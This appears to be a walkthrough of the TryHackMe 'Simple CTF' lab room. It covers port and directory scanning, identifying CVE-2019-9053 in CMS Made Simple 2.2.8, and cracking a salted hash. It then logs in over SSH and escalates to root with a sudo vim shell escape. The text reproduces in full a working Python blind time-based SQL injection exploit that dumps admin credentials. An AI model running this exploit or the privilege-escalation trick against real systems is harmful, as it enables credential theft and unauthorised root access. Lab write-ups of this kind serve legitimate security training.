Try Hack Me - Simple CTF
Beginner level ctf
Howdy my fellow Cyber Enthusiasts! Welcome to another room Try Hack Me offers! So let's dive in! π You can click on the "Start AttackBox" button for a Linux machine to be available on the right-side of your page, so you can follow this walkthrough.
π‘
How many services are running under port 1000?
Let's start with a basic nmap scan.
π‘
Nmap (Network Mapper) is a free, open-source tool used for network discovery and security auditing. It helps administrators and security professionals identify devices on a network, detect open ports and running services, determine operating systems, and assess potential security risks. Nmap is widely used for tasks like network inventory, vulnerability assessment, and troubleshooting connectivity issues.
$ sudo nmap -sV -p- $IP
# -sV: Probe open ports to determine service/version info
# -p-: Scans all ports from 1-65535Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-12 16:28 +0300
Nmap scan report for 10.112.155.12
Host is up (0.047s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
[redacted]/tcp open [redacted] [redacted]
[redacted]/tcp open [redacted] [redacted]
[redacted]/tcp open [redacted] [redacted]
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.28 secondsπ‘
What is running on the higher port?
Just identify the service based on the previous nmap scan.
π‘
What's the CVE you're using against the application?
Hmm... Let's enumerate the target a bit further. We might find something interesting. Let's use gobuster.
π‘
Gobuster is a fast, open-source command-line tool written in Go that is commonly used for web and network enumeration. It helps security professionals discover hidden directories, files, subdomains, virtual hosts, and cloud storage buckets by performing brute-force searches with wordlists. Gobuster is widely used during penetration testing and security assessments to uncover exposed resources and misconfigurations.
$ gobuster dir -u 10.112.155.12:80 -w /usr/share/dirb/wordlists/big.txt
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.112.155.12:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
.htpasswd (Status: 403) [Size: 297]
.htaccess (Status: 403) [Size: 297]
robots.txt (Status: 200) [Size: 929]
server-status (Status: 403) [Size: 301]
[redacted] (Status: 301) [Size: 315] [--> http://10.112.155.12/[redacted]/]Great. Let's go there now. π
In the footer page, we found that this webserver runs CMS Made Simple and specifically version 2.2.8. Let's see if we can find a CVE for this.
With a bit of searching we found the following CVE. Nice job!
NVD - CVE-2019-9053
π‘
To what kind of vulnerability is the application vulnerable?
The mentioned CVE provides a short description to help guide us further regarding the vulnerability.
π‘
An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1_idlist parameter.
π‘
What's the password?
We can use the exploit found in the following webpage or use searcsploit from our terminal.
CMS Made Simple < 2.2.10 - SQL Injection
CMS Made Simple < 2.2.10 - SQL Injection. CVE-2019-9053 . webapps exploit for PHP platform
Daniele Scanu
$ searchsploit 46635
-------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
-------------------------------------------- ---------------------------------
Shellcodes: No Results$ locate 46635.py
/usr/share/exploitdb/exploits/php/webapps/46635.pyThe code is written in Python2. We can convert it to Python3 using an online converter.
Python 2 to 3 converter online - Python2to3
Automated Python 2 to 3 converter online
Python2to3
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()
if not options.url:
print("[+] Specify an url target")
print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
wordlist += options.wordlist
def crack_password():
global password
global output
global wordlist
global salt
dict = open(wordlist)
for line in dict.readlines():
line = line.replace("\n", "")
beautify_print_try(line)
if hashlib.md5(str(salt) + line).hexdigest() == password:
output += "\n[+] Password cracked: " + line
break
dict.close()
def beautify_print_try(value):
global output
print("\033c")
cprint(output,'green', attrs=['bold'])
cprint('[*] Try: ' + value, 'red', attrs=['bold'])
def beautify_print():
global output
print("\033c")
cprint(output,'green', attrs=['bold'])
def dump_salt():
global flag
global salt
global output
ord_salt = ""
ord_salt_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_salt = salt + dictionary[i]
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_salt)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
salt = temp_salt
ord_salt = ord_salt_temp
flag = True
output += '\n[+] Salt for password found: ' + salt
def dump_password():
global flag
global password
global output
ord_password = ""
ord_password_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_password = password + dictionary[i]
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_password)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
password = temp_password
ord_password = ord_password_temp
flag = True
output += '\n[+] Password found: ' + password
def dump_username():
global flag
global db_name
global output
ord_db_name = ""
ord_db_name_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_db_name = db_name + dictionary[i]
ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_db_name)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
db_name = temp_db_name
ord_db_name = ord_db_name_temp
output += '\n[+] Username found: ' + db_name
flag = True
def dump_email():
global flag
global email
global output
ord_email = ""
ord_email_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_email = email + dictionary[i]
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_email)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
email = temp_email
ord_email = ord_email_temp
output += '\n[+] Email found: ' + email
flag = True
dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
print(colored("[*] Now try to crack password"))
crack_password()
beautify_print()Next, let's create a file called crack.hash that contains the hash and the salt, so we are able to crack it.
echo '0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2' > crack.hash
hashcat -m 10 --show crack.hash /usr/share/wordlists/rockyou.txtWait for a couple of seconds and it will be cracked!
π‘
Where can you login with the details obtained?
Remember our nmap scan at the beginning? Try to login to one of those services and you will find the answer.
π‘
What's the user flag?
Remember to use the changed ssh port.
ssh [redacted]@10.112.155.12 -p 2222
$ cat user.txt
[redacted]π‘
Is there any other user in the home directory? What's its name?
$ cd /home
$ ls
[redacted] [redacted]π‘
What can you leverage to spawn a privileged shell?
Just use the following command to be able to see if you can spawn a privileged shell.
$ sudo -l
User [redacted] may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/[redacted]π‘
What's the root flag?
π‘
If the binary is allowed to run as superuser by
sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.There's a great website that is worth taking a look. π
vim | GTFOBins
sudo vim -c ':!/bin/sh'
$ id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
[redacted]Congratulations! You have solved this room! π π π